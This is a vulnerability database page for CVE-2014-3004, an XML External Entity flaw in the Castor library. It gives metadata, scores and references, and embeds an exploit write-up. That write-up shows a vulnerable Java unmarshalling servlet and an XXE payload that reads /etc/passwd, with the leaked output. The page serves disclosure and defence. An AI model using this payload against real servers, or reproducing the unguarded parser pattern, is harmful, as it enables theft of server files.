CVE-2014-3004 : Detail

CVE-2014-3004

A05-Security Misconfiguration
0.78%V4
Network
2014-06-11
12h00 +00:00
2021-10-20
08h37 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The default configuration for the Xerces SAX Parser in Castor before 1.3.3 allows context-dependent attackers to conduct XML External Entity (XXE) attacks via a crafted XML document.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-611 Improper Restriction of XML External Entity Reference
The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 39205

Publication date : 2014-05-26 22h00 +00:00
Author : Ron Gutierrez
EDB Verified : Yes

source: https://www.securityfocus.com/bid/67676/info Castor Library is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information that may lead to further attacks. Caster Library 1.3.3-RC1 and earlier are vulnerable. =========================================================== Proof-of-Concept Code and Exploit =========================================================== Now let’s look at how Castor handles unmarshalling calls to show how an application could be vulnerable: In this simple class, we create Person object: ..snip.. public class Person implements java.io.Serializable { /** The name of the person */ private String name = null; /** The Date of birth */ private Date dob = null; /** Creates a Person with no name */ public Person() { super(); } /** Creates a Person with the given name */ public Person(String name) { this.name = name; } ..snip.. Next, we generate a class that takes in external XML data to convert the XML document to a Person Object using the unmarshalling function: public static Person deserializePersonWithStatic(String xmlInput) { StringReader xmlReader = new StringReader(xmlInput); Person aPerson = null; try { aPerson = (Person) Unmarshaller.unmarshal(Person.class, xmlReader); } catch (Exception e) { System.out.println("Failed to unmarshal the xml"); e.printStackTrace(); } return aPerson; } If our application took in the XML data from a user controllable location and passed it through this unmarshalling function, the end user could use this functionality to view local resources on the application’s hosting server. For example, look at the following Servlet that takes in XML data from the Request: public class GeneratePerson extends HttpServlet { public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { String evilPersonXML = req.getParameter(“person”); Person anotherPerson = deserializePersonWithStatic(evilPersonXML); if(anotherPerson == null) { System.out.println("No Person Object set"); } else { System.out.println("XXE Person name: " + anotherPerson.getName()); } What would happen if we passed the following string into the “person” request parameter value?: <?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE doc [ <!ENTITY x3 SYSTEM "file:///etc/passwd"> ] <person><name>&x3;</name></person> The output would be the following: XXE Person name: ## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # See the opendirectoryd(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false ..snip.. As you can see, the unmarshalling function allowed external entities to be referenced and therefore the contents of the server’s /etc/passwd file was set within the “name” variable of the deserialized Person object.

Products Mentioned

Configuraton 0

Castor_project>>Castor >> Version To (including) 1.3.2

Castor_project>>Castor >> Version 1.3

Castor_project>>Castor >> Version 1.3.1

Configuraton 0

Opensuse>>Opensuse >> Version 13.1

Opensuse_project>>Opensuse >> Version 12.3

References

http://seclists.org/fulldisclosure/2014/May/142
Tags : mailing-list, x_refsource_FULLDISC
http://secunia.com/advisories/59427
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/67676
Tags : vdb-entry, x_refsource_BID
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.